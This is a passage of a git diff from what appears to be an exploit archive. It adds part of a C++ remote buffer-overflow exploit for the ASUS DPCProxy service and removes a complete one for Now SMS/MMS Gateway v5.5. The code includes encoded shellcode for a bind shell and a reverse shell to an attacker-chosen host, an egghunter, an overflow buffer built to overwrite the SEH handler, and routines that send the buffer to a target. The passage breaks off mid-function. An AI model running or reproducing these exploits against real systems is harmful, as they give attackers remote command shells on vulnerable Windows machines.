+ *(strchr(remotehost,':'))='\0';
+ }
+ break;
+ case 't':
+ sscanf(optarg, "%d", &itarget);
+ itarget--;
+ break;
+ case 'T':
+ sscanf(optarg, "%ld", &dwTimeout);
+ break;
+ default:
+ usage(argv[0]);
+ WSACleanup();
+ return -1;
+ }
+ }
+ if(remotehost == NULL)
+ {
+ printf(" [-] Please enter remotehost\n");
+ end_logo();
+ WSACleanup();
+ return -1;
+ }
+ print_info_banner_line("Host", remotehost);
+ sprintf(temp1, "%d", port);
+ print_info_banner_line("Port", temp1);
+ print_info_banner_line("Payload", shellcodes[sh].name);
+
+ if(sh==0)
+ {
+ sprintf(temp1, "%d", 4444);
+ print_info_banner_line("BINDPort", temp1);
+ }
+
+ printf(" # ------------------------------------------------------------------- # \n");
+ fflush(stdout);
+
+
+ memset(payloadbuffer, 0, sizeof(payloadbuffer));
+ fshellcode.ptr=payloadbuffer;
+ fshellcode.size=0;
+
+ memset(a_buffer, 0, sizeof(a_buffer));
+ sbuffer.ptr=a_buffer;
+ sbuffer.size=0;
+
+ if(!construct_shellcode(sh, &fshellcode, itarget))
+ {
+ end_logo();
+ WSACleanup();
+ return -1;
+ }
+
+ printf(" [+] Payload constructed\n");
+
+ if(!construct_buffer(&fshellcode, itarget, &sbuffer))
+ {
+ printf(" [-] Buffer not constructed\n");
+ end_logo();
+ WSACleanup();
+ return -1;
+ }
+ printf(" [+] Final buffer constructed\n");
+
+
+ if(!execute(&sbuffer, remotehost, port))
+ {
+ printf(" [-] Buffer not sent\n");
+ end_logo();
+ WSACleanup();
+ return -1;
+ }
+ printf(" [+] Buffer sent\n");
+
+ end_logo();
+ WSACleanup();
+ return 0;
+}
+
+int construct_shellcode(int sh, struct _buf * shf, int target)
+{
+ memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
+ shf->size=shellcodes[sh].length;
+ return 1;
+}
+
+
+char JMPX[] =
+ // get ecx
+ "\x89\xE6\xDB\xDD\xD9\x76\xF4\x59"
+ // alphanum-decoder
+ "\x49\x49\x49"
+ "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
+ "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+ "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+ // encoded jump
+ "\x59\x6f\x7a\x47\x41"
+ // back jump
+ "\x89\xE6\xDB\xDD\xD9\x76\xF4\x5f\x81\xef\xf8\x1a\x00\x00\xeb\xb3";
+
+int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf)
+{
+ unsigned char * cp = sbuf->ptr;
+ memset(cp, 'A', 1000);
+ cp+=20;
+ memcpy(cp, shf->ptr, shf->size);
+ cp+=1000-20;
+ memset(cp, 'B', 1000);
+ cp+=1000;
+ memset(cp, 'C', 1000);
+ cp+=1000;
+ memset(cp, 'D', 1000);
+ cp+=1000;
+ memset(cp, 'E', 1000);
+ cp+=1000;
+ memset(cp, 'F', 1000);
+ cp+=1000;
+ memset(cp, 'G', 1000-62-sizeof(JMPX)+1);
+ cp+=1000-62-sizeof(JMPX)+1;
+
+ // code to jump back
+ memcpy(cp, JMPX,sizeof(JMPX)-1);
+ cp+=sizeof(JMPX)-1;
+
+ // next SEH record and back jump
+ *cp++='\x90';
+ *cp++='\x90';
+ *cp++='\xeb';
+ *cp++='\xec';
+
+ // replace SEH
+ *cp++ = (char)((targets[target].ret ) & 0xff);
+ *cp++ = (char)((targets[target].ret >> 8) & 0xff);
+ *cp++ = (char)((targets[target].ret >> 16) & 0xff);
+ *cp++ = (char)((targets[target].ret >> 24) & 0xff);
+
+ memset(cp, 'H', 1000);
+ cp+=1000;
+
+ sbuf->size=(int)(cp-sbuf->ptr);
+ return 1;
+}
+
+
+void extract_ip_and_port( char * &remotehost, int * port, char * str)
+{
+ if (strchr(str,':')==NULL)
+ {
+ remotehost=str;
+ }else
+ {
+ sscanf(strchr(str,':')+1, "%d", port);
+ remotehost=str;
+ *(strchr(remotehost,':'))='\0';
+ }
+}
+
+
+
+int hr2_connect(char * remotehost, int port, int timeout)
+{
+ SOCKET s;
+ struct hostent *host;
+ struct sockaddr_in addr;
+ TIMEVAL stTime;
+ TIMEVAL *pstTime = NULL;
+ fd_set x;
+ int res;
+
+ if (INFINITE != timeout)
+ {
+ stTime.tv_sec = timeout / 1000;
+ stTime.tv_usec = timeout % 1000;
+ pstTime = &stTime;
+ }
+
+ host = gethostbyname(remotehost);
+ if (!host) return SOCKET_ERROR;
+
+ addr.sin_addr = *(struct in_addr*)host->h_addr;
+ addr.sin_port = htons(port);
+ addr.sin_family = AF_INET;
+
+ s = socket(AF_INET, SOCK_STREAM, 0);
+ if (s == SOCKET_ERROR)
+ {
+ closesocket(s);
+ return SOCKET_ERROR;
+ }
+
+ unsigned long l = 1;
+ ioctlsocket( s, FIONBIO, &l ) ;
+
+ connect(s, (struct sockaddr*)&addr, sizeof(addr));
+
+ FD_ZERO(&x);
+ FD_SET(s, &x);
+
+ res = select(NULL,NULL,&x,NULL,pstTime);
+ if(res< 0) return SOCKET_ERROR;
+ if(res==0) return 0;
+ return (int)s;
+}
+
+
+int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
+{
+ return send(s, (char *)buf, len, 0);
+}
+
+int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
+{
+ TIMEVAL stTime;
+ TIMEVAL *pstTime = NULL;
+ fd_set xy;
+ int res;
+
+ if (INFINITE != timeout)
+ {
+ stTime.tv_sec = timeout / 1000;
+ stTime.tv_usec = timeout % 1000;
+ pstTime = &stTime;
+ }
+ FD_ZERO(&xy);
+ FD_SET(s, &xy);
+
+ res = select(NULL,&xy,NULL,NULL,pstTime);
+
+ if(res==0) return 0;
+ if(res<0) return -1;
+
+ return recv(s, (char *)buf, len, 0);
+}
+
+int execute(struct _buf * abuf, char * remotehost, int port)
+{
+ int x;
+ SOCKET s ;
+ unsigned char rbuf[7000];
+ unsigned int i;
+ int rsize=7000;
+ s = hr2_connect(remotehost, port, 10000);
+ if(s==0)
+ {
+ printf(" [-] connect() timeout\n");
+ return 0;
+ }
+ if(s==SOCKET_ERROR)
+ {
+ printf(" [-] Connection failed\n");
+ return 0;
+ }
+
+ x = hr2_tcprecv(s, rbuf, 5000, 10000);
+ x = hr2_tcprecv(s, rbuf, 5000, 10000);
+
+ for(i=0;isize/1000;i++)
+ {
+ printf(" [+] Chunk %d/%d sent\n", i+1,abuf->size/1000);
+ x = hr2_tcpsend(s, abuf->ptr+1000*i, 1000, 0);
+ if(x<1000) return -1;
+ Sleep(1000);
+ x = hr2_tcprecv(s, rbuf, 5000, 10000);
+ }
+ return 1;
+}
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring)
+{
+ static char *next = NULL;
+ if (optind == 0)
+ next = NULL;
+
+ optarg = NULL;
+
+ if (next == NULL || *next == '\0')
+ {
+ if (optind == 0)
+ optind++;
+
+ if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
+ {
+ optarg = NULL;
+ if (optind < argc)
+ optarg = argv[optind];
+ return EOF;
+ }
+
+ if (strcmp(argv[optind], "--") == 0)
+ {
+ optind++;
+ optarg = NULL;
+ if (optind < argc)
+ optarg = argv[optind];
+ return EOF;
+ }
+
+ next = argv[optind];
+ next++; // skip past -
+ optind++;
+ }
+
+ char c = *next++;
+ char *cp = strchr(optstring, c);
+
+ if (cp == NULL || c == ':')
+ return '?';
+
+ cp++;
+ if (*cp == ':')
+ {
+ if (*next != '\0')
+ {
+ optarg = next;
+ next = NULL;
+ }
+ else if (optind < argc)
+ {
+ optarg = argv[optind];
+ optind++;
+ }
+ else
+ {
+ return '?';
+ }
+ }
+
+ return c;
+}
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+void print_info_banner_line(const char * key, const char * val)
+{
+ char temp1[100], temp2[100];
+
+ memset(temp1,0,sizeof(temp1));
+ memset(temp1, '\x20' , 58 - strlen(val) -1);
+
+ memset(temp2,0,sizeof(temp2));
+ memset(temp2, '\x20' , 8 - strlen(key));
+ printf(" # %s%s: %s%s# \n", key, temp2, val, temp1);
+
+}
+
+
+
+void usage(char * s)
+{
+ int j;
+ printf("\n");
+ printf(" Usage: %s -h -t \n", s);
+ printf(" -------------------------------------------------------------------\n");
+ printf(" Arguments:\n");
+ printf(" -h ........ host to attack, default port: 623\n");
+ printf(" -t ........ target to use\n");
+ printf(" -T ........ socket timeout\n");
+ printf("\n");
+ printf(" Supported ASUS DPCProxy versions:\n");
+ for(j=0; targets[j].t!=0;j++)
+ {
+ printf(" %d. %s\n",j+1, targets[j].t);
+ }
+ printf("\n");
+ for(j=0; shellcodes[j].name!=0;j++)
+ {
+ printf(" %d. %s\n",j+1, shellcodes[j].name);
+ }
+ end_logo();
+}
+
+void logo()
+{
+ printf("\n\n");
+ printf(" ####################################################################### \n");
+ printf(" # ____ __ _ ______ __ _____ #\n");
+ printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
+ printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
+ printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
+ printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
+ printf(" # crew #\n");
+ printf(" ####################################################################### \n");
+ printf(" # Exploit : ASUS DPCPROXY Service 2.0.0.16-19 # \n");
+ printf(" # Author : Heretic2 (http://www.dreatica.cl/) # \n");
+ printf(" # Version : 1.0 # \n");
+ printf(" # System : Windows ALL # \n");
+ printf(" # Date : 02.04.2008 - 04.04.2008 # \n");
+ printf(" # ------------------------------------------------------------------- # \n");
+}
+
+void end_logo()
+{
+ printf(" # ------------------------------------------------------------------- # \n");
+ printf(" # Dreatica-FXP crew [Heretic2] # \n");
+ printf(" ####################################################################### \n\n");
+}
+
+// milw0rm.com [2008-05-29]
diff --git a/platforms/windows/remote/5695.cpp b/platforms/windows/remote/5695.cpp
index cce46f45f..552ae3f7c 100755
--- a/platforms/windows/remote/5695.cpp
+++ b/platforms/windows/remote/5695.cpp
@@ -1,774 +1,774 @@ -/* Dreatica-FXP crew -* -* ---------------------------------------- -* Target : Now SMS/MMS Gateway v5.5 and others -* ---------------------------------------- -* Exploit : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit -* Exploit date : 14.04.2008 -* Exploit writer : Heretic2 (heretic2x@gmail.com) -* OS : Windows ALL -* Tested : Windows 2000 Server -* Crew : Dreatica-FXP -* Location : http://www.milw0rm.com/ -* ---------------------------------------- -* Info : We obtain EIP after sending a long Authentificate request to server -* Egghunter help here. -* ---------------------------------------- -* Thanks to: -* 1. Luigi Auriemma ( http://aluigi.org ) -* 2. The Metasploit project ( http://metasploit.com ) -* 3. ALPHA 2: Zero-tolerance ( ) -* 4. Dreatica-FXP crew ( ) -************************************************************************************ -* This was written for educational purpose only. Use it at your own risk. Author will be not be -* responsible for any damage, caused by that code. 
-*/ - -#include -#include -#include -#include -#include - -#pragma comment(lib,"ws2_32") - - -void usage(char * s); -void logo(); -void end_logo(); -void print_info_banner_line(const char * key, const char * val); - -void extract_ip_and_port( char * &remotehost, int * port, char * str); -int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx); -void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret); - -int hr2_connect(char * remotehost, int port, int timeout); -int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout); -int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout); -int execute(struct _buf * abuf, char * remotehost, int port); - -struct _buf -{ - unsigned char * ptr; - unsigned int size; -}; -int construct_shellcode(int sh, struct _buf * shf, int target,char * rerverseip, int reverseport); -int construct_buffer(struct _buf * shf, int target, struct _buf * abuf); - - - - -// ----------------------------------------------------------------- -// XGetopt.cpp Version 1.2 -// ----------------------------------------------------------------- -int getopt(int argc, char *argv[], char *optstring); -char *optarg; // global argument pointer -int optind = 0, opterr; // global argv index -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- - - -struct { - const char * name; - int length; - char *shellcode; -}shellcodes[]={ - {"Bindshell, port 4444 [ args: none ]", 696, - /* win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49" - "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" - "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32" - 
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62" - "\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71" - "\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c" - "\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47" - "\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35" - "\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c" - "\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a" - "\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a" - "\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64" - "\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34" - "\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50" - "\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64" - "\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31" - "\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69" - "\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30" - "\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78" - "\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f" - "\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73" - "\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e" - "\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62" - "\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71" - "\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65" - "\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32" - "\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e" - "\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69" - "\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79" - "\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d" - "\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49" - "\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70" 
- "\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45" - "\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36" - "\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32" - "\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e" - "\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50" - "\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32" - "\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a" - "\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48" - "\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30" - "\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39" - "\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b" - "\x4f\x6a\x76\x6b\x4f\x78\x50\x42" - }, - {"ReverseShell [ args: -R ]", - 287, - /* - * windows/shell_reverse_tcp - 287 bytes - * http://www.metasploit.com - * Encoder: generic/none - */ - "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b" - "\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01" - "\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07" - "\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" - "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b" - "\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c" - "\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff" - "\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" - "\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08" - "\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53" - "\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66" - "\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff" - "\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a" - "\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" - "\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68" - "\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" - 
"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff" - "\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04" - "\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6" - "\xff\xd0" - }, - {NULL, 0, NULL} -}; - - - - -struct _target{ - const char *t ; - unsigned long ret ; -} targets[]= -{ - {"Now SMS/MMS Gateway universal", 0x10002f9d }, - {"Now SMS/MMS Gateway v5.5", 0x0027727c }, - {"DOS/Crash/Debug/Test/Fun", 0x41414141 }, - {NULL, 0x00000000 } -}; - - -char egghunter[] = - "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05" - "\x5a\x74\xef\xb8\x44\x46\x58\x50\x8b\xfa\xaf\x75\xea\xaf\x75\xe7" - "\xff\xe7"; - -char header_b[] = - "GET / HTTP/1.0\r\n" - "User-Agent: "; -char header_m[] ="\r\n" - "Authorization: Basic "; -char header_e[] = "\r\n\r\n"; - - -// memory for buffers -unsigned char payloadbuffer[10000], a_buffer[10000]; -long dwTimeout=5000; -int timeout=5000; - -// alphanumeric decoder took from "ALPHA 2: Zero-tolerance." code -char alphanum_decoder[] = - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" - "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41" - "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" - "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"; -// alphanumeric encoder took from "ALPHA 2: Zero-tolerance." 
code -int alphanumeric_exec(char *to_encode, int len, char *encoded, int * rlen ) -{ - int i,ii=0, input, A, B, C, D, E, F, length=(int)strlen(to_encode); - char* valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; // mixed chars - char temp[10]; - memset(temp, 0 , sizeof(temp)); - srand((int)clock()); - for(ii=0;ii> 4; - B = (input & 0x0f); - F = B; - i = rand() % ((int)strlen(valid_chars)); - while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); } - E = valid_chars[i] >> 4; - D = (A^E); - i = rand() % ((int)strlen(valid_chars)); - while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); } - C = valid_chars[i] >> 4; - sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F); - encoded[strlen(encoded)]=temp[0]; - encoded[strlen(encoded)]=temp[1]; - } - encoded[strlen(encoded)]='A'; - *rlen=(int)strlen(encoded); - return 1; - -} - -int main(int argc, char **argv) -{ - char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100]; - int HAVE_R=0,HAVE_U=0,sh,port=8800,itarget=0,reverseport=9999; - struct _buf fshellcode, sbuffer; - - logo(); - if(argc<2) - { - usage(argv[0]); - return -1; - } - - WSADATA wsa; - WSAStartup(MAKEWORD(2,0), &wsa); - // set defaults - sh=0; - // ------------ - - while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF) - { - switch (c) - { - case 'h': - if (strchr(optarg,':')==NULL) - { - remotehost=optarg; - }else - { - sscanf(strchr(optarg,':')+1, "%d", &port); - remotehost=optarg; - *(strchr(remotehost,':'))='\0'; - } - break; - case 't': - sscanf(optarg, "%d", &itarget); - itarget--; - break; - case 'R': - HAVE_R=1; - if (strchr(optarg,':')==NULL) - { - reverseip=optarg; - }else - { - sscanf(strchr(optarg,':')+1, "%d", &reverseport); - reverseip=optarg; - *(strchr(reverseip,':'))='\0'; - } - break; - case 'T': - sscanf(optarg, "%ld", &dwTimeout); - break; - default: - usage(argv[0]); - WSACleanup(); - return -1; - } - } - sh=HAVE_R; - - if(remotehost == NULL) - { - printf(" [-] 
Please enter remotehost\n"); - end_logo(); - WSACleanup(); - return -1; - } - print_info_banner_line("Host", remotehost); - sprintf(temp1, "%d", port); - print_info_banner_line("Port", temp1); - print_info_banner_line("Payload", shellcodes[sh].name); - - if(sh==0) - { - sprintf(temp1, "%d", 4444); - print_info_banner_line("BINDPort", temp1); - } - if(sh==1) - { - print_info_banner_line("CB IP", reverseip); - sprintf(temp1, "%d", reverseport); - print_info_banner_line("CB port", temp1); - } - printf(" # ------------------------------------------------------------------- # \n"); - fflush(stdout); - - - memset(payloadbuffer, 0, sizeof(payloadbuffer)); - fshellcode.ptr=payloadbuffer; - fshellcode.size=0; - - memset(a_buffer, 0, sizeof(a_buffer)); - sbuffer.ptr=a_buffer; - sbuffer.size=0; - - if(!construct_shellcode(sh, &fshellcode, itarget, reverseip, reverseport)) - { - end_logo(); - WSACleanup(); - return -1; - } - - printf(" [+] Payload constructed\n"); - - if(!construct_buffer(&fshellcode, itarget, &sbuffer)) - { - printf(" [-] Buffer not constructed\n"); - end_logo(); - WSACleanup(); - return -1; - } - printf(" [+] Final buffer constructed\n"); - - - if(!execute(&sbuffer, remotehost, port)) - { - printf(" [-] Buffer not sent\n"); - end_logo(); - WSACleanup(); - return -1; - } - printf(" [+] Buffer sent\n"); - - end_logo(); - WSACleanup(); - return 0; -} -int construct_shellcode(int sh, struct _buf * shf, int target, char * rerverseip, int reverseport) -{ - int x; - char fsh[1000]; - - memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length); - shf->size=shellcodes[sh].length; - if(sh==1) - { - memset(shf->ptr,0,shf->size+1); - memset(fsh,0,sizeof(fsh)); - memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length); - - - static struct hostent *host = gethostbyname(rerverseip); - static struct sockaddr_in addr; - if(host == NULL) - { - printf(" [-] Reverse ip/hostanme is invalid\n"); - return 0; - } - - addr.sin_addr = *(struct in_addr*)host->h_addr; - 
fsh[160] = (addr.sin_addr.S_un.S_un_b.s_b1) ; - fsh[161] = (addr.sin_addr.S_un.S_un_b.s_b2) ; - fsh[162] = (addr.sin_addr.S_un.S_un_b.s_b3) ; - fsh[163] = (addr.sin_addr.S_un.S_un_b.s_b4) ; - - fsh[166] = ((reverseport >> 8) & 0xff) ; - fsh[167] = ((reverseport ) & 0xff) ; - - memcpy(shf->ptr,alphanum_decoder,sizeof(alphanum_decoder)-1); - alphanumeric_exec(fsh, shellcodes[sh].length, (char*)(shf->ptr+sizeof(alphanum_decoder)-1), &x); - shf->size = sizeof(alphanum_decoder)-1+x; - } - return 1; -} - -int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf) -{ - unsigned char * cp, *lp ; - char buf[10000],encoded[10000],encoded2[10000], useragent[10000]; - int len, slen; - - // - cp=(unsigned char *)useragent; - *cp++ = '\x44'; - *cp++ = '\x46'; - *cp++ = '\x58'; - *cp++ = '\x50'; - *cp++ = '\x44'; - *cp++ = '\x46'; - *cp++ = '\x58'; - *cp++ = '\x50'; - *cp++ = '\x41'; - *cp++ = '\x41'; - *cp++ = '\x41'; - memcpy(cp, shf->ptr, shf->size); - cp+=shf->size; - slen=(int)(cp-(unsigned char *)useragent); - - - // make egghunter - memset(buf, 0, sizeof(buf)); - memset(encoded, 0, sizeof(encoded)); - memset(encoded2, 0, sizeof(encoded2)); - - cp=(unsigned char *)buf; - memset(cp, '\x41', 129); - cp+=129; - - *cp++ = (unsigned char)((targets[target].ret ) & 0xff); - *cp++ = (unsigned char)((targets[target].ret >> 8) & 0xff); - *cp++ = (unsigned char)((targets[target].ret >> 16) & 0xff); - *cp++ = (unsigned char)((targets[target].ret >> 24) & 0xff); - - *cp++ = '\x90'; - *cp++ = '\x90'; - *cp++ = '\x90'; - *cp++ = '\x90'; - - memcpy(cp, egghunter, strlen(egghunter)); - cp+=strlen(egghunter); - - memset(cp, '\x42', 500); - cp+=500; - len=(int)(cp-(unsigned char * )buf); - base64_encode((const unsigned char *)buf,len,(char *)encoded); - base64_encode((const unsigned char *)encoded,strlen(encoded),(char *)encoded2); - // --- - - - cp = sbuf->ptr; - memcpy(cp, header_b,strlen(header_b)); - cp+=strlen(header_b); - memcpy(cp, useragent,slen); - cp+=slen; - memcpy(cp, 
header_m,strlen(header_m)); - cp+=strlen(header_m); - memcpy(cp, encoded2,strlen(encoded2)); - cp+=strlen(encoded2); - memcpy(cp, header_e,strlen(header_e)); - cp+=strlen(header_e); - - sbuf->size=(int)(cp-sbuf->ptr); - return 1; -} - - -void extract_ip_and_port( char * &remotehost, int * port, char * str) -{ - if (strchr(str,':')==NULL) - { - remotehost=str; - }else - { - sscanf(strchr(str,':')+1, "%d", port); - remotehost=str; - *(strchr(remotehost,':'))='\0'; - } -} - - - -int hr2_connect(char * remotehost, int port, int timeout) -{ - SOCKET s; - struct hostent *host; - struct sockaddr_in addr; - TIMEVAL stTime; - TIMEVAL *pstTime = NULL; - fd_set x; - int res; - - if (INFINITE != timeout) - { - stTime.tv_sec = timeout / 1000; - stTime.tv_usec = timeout % 1000; - pstTime = &stTime; - } - - host = gethostbyname(remotehost); - if (!host) return SOCKET_ERROR; - - addr.sin_addr = *(struct in_addr*)host->h_addr; - addr.sin_port = htons(port); - addr.sin_family = AF_INET; - - s = socket(AF_INET, SOCK_STREAM, 0); - if (s == SOCKET_ERROR) - { - closesocket(s); - return SOCKET_ERROR; - } - - unsigned long l = 1; - ioctlsocket( s, FIONBIO, &l ) ; - - connect(s, (struct sockaddr*)&addr, sizeof(addr)); - - FD_ZERO(&x); - FD_SET(s, &x); - - res = select(NULL,NULL,&x,NULL,pstTime); - if(res< 0) return SOCKET_ERROR; - if(res==0) return 0; - return (int)s; -} - - -int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout) -{ - return send(s, (char *)buf, len, 0); -} - -int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout) -{ - TIMEVAL stTime; - TIMEVAL *pstTime = NULL; - fd_set xy; - int res; - - if (INFINITE != timeout) - { - stTime.tv_sec = timeout / 1000; - stTime.tv_usec = timeout % 1000; - pstTime = &stTime; - } - FD_ZERO(&xy); - FD_SET(s, &xy); - - res = select(NULL,&xy,NULL,NULL,pstTime); - - if(res==0) return 0; - if(res<0) return -1; - - return recv(s, (char *)buf, len, 0); -} - -int execute(struct _buf * abuf, char * 
